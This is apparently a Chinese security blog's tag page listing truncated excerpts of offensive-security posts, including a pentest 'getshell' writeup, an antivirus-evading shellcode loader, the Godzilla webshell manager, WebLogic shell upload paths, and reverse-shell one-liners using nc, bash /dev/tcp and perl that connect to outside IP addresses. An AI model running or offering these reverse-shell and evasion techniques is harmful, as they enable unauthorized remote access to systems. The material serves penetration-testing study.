51工具盒子

依楼听风雨
笑看云卷云舒,淡观潮起潮落

shell

一次暴露面全开的红帽渗透测试【getshell】

一次暴露面全开的红帽渗透测试【getshell】

厉飞雨 阅读(163) 评论(0) 赞(9)

0x01、信息收集阶段 =========== 注:本次信息收集过程主要使用FOFA网络探测平台 [https://fofa.info/](https://fofa.info/===) 一开始进行收集的时候,有点迷,直接进行了大面积的"gov.in"域名收集 ``` host="gov.in" &...

RWCTF 5th Shellfind复现

RWCTF 5th Shellfind复现

厉飞雨 阅读(163) 评论(0) 赞(8)

### 前言 RealWorld CTF 5th 里的一道iot-pwn,根据真实设备固件改编而成,觉得题目贴近iot实战且很有意思,故在此记录一下复现过程。 ### 题目分析 #### 题目描述 Hello Hacker. ...

深入解析Linux rbash:通过实际示例解释受限的Bash Shell

深入解析Linux rbash:通过实际示例解释受限的Bash Shell

厉飞雨 阅读(104) 评论(0) 赞(9)

在Linux以及类Unix系统中,安全性至关重要,尤其是当多个用户共享一个系统时。其中,增强安全性的一种方法是使用受限[shell](https://51tbox.com/ "shell"),rbash(Restricted Bash)就是这样的一种shell 。 接下来小编将简单介绍什么是rbash,它与常规Bash shell有何不同,并通过使用几个实...

新鲜出炉免杀ShellcodeLoader

新鲜出炉免杀ShellcodeLoader

厉飞雨 阅读(139) 评论(0) 赞(5)

使用效果 在动态加载方式勾选反沙箱之后,结果如下: ![](https://mmbiz.qpic.cn/sz_mmbiz_png/4PzD69su9gVHDwuoQnna9aw1pjmYaR5miaGKrFPsBzwdSAuV5XTr56yTPQvN5dMutIzYvEeVQHpdhQ5QH8icQDKQ/640?wx_fmt=png&tp=webp&wxf...

哥斯拉Godzilla shell管理工具

哥斯拉Godzilla shell管理工具

厉飞雨 阅读(139) 评论(0) 赞(5)

前言 === 今年hw有点牛批,昨天爆出一堆0day,冰蝎也出了3.0,今天又看到一个哥斯拉,听说比冰蝎还nb(安全性自测,会不会是蓝队放出来的0_0) 哥斯拉优点 ===== * 1哥斯拉全部类型的shell均过市面所有静态查杀(特征随便改改就能继续过) * 2哥斯拉流量加密过市面全部流量waf * 3哥斯拉的自带的插件是冰蝎、蚁剑不能比拟的(看了一下确实香) 项...

记weblogic上传shell路径

记weblogic上传shell路径

厉飞雨 阅读(150) 评论(0) 赞(6)

前言 === weblogic最近又出境了,小记一波。 路径 === 1、image目录 c:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp shell访问 http://xxxx/con...

metasploit与Cobaltstrike互相派生转化shell

metasploit与Cobaltstrike互相派生转化shell

厉飞雨 阅读(121) 评论(0) 赞(7)

前言 === 一般大家都是两款神器结合使用,自然少不了shell之间转换。 msf转cs ====== 首先cs创建一个windows/becon_http/reverse_http的 Listener 再用msf弹shell过去 msf exploit(handler) > use exploit/windows/local/payload_i...

记执行shell脚本出现^M不存在或者行尾多出%0D的问题

记执行shell脚本出现^M不存在或者行尾多出%0D的问题

厉飞雨 阅读(116) 评论(0) 赞(8)

前言 === 刚刚用windows写了个脚本,拿到kali执行发现的问题(还是太垃圾了) 解决 === 用windows系统打开过的文档会被改为dos格式 dos格式:CR LF unix格式:LF 在vim中用\*\*:set ff**查看格式 用** :set ff=unix**和**:set ff=dos\*\*来改变格式

简单使用nc反弹shell

简单使用nc反弹shell

厉飞雨 阅读(104) 评论(0) 赞(7)

使用 === 正向shell: nc -lvvp 1988 -e /bin/bash nc 10.1.10.2 1988 //攻击鸡 反向shell: nc -e /bin/bash 152.54.56.4 1988 nc -lvvp 1988 //攻击鸡 注...

各种环境反弹shell分享

各种环境反弹shell分享

厉飞雨 阅读(117) 评论(0) 赞(4)

说明 === 分享一下各种版本的shell写法 bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM...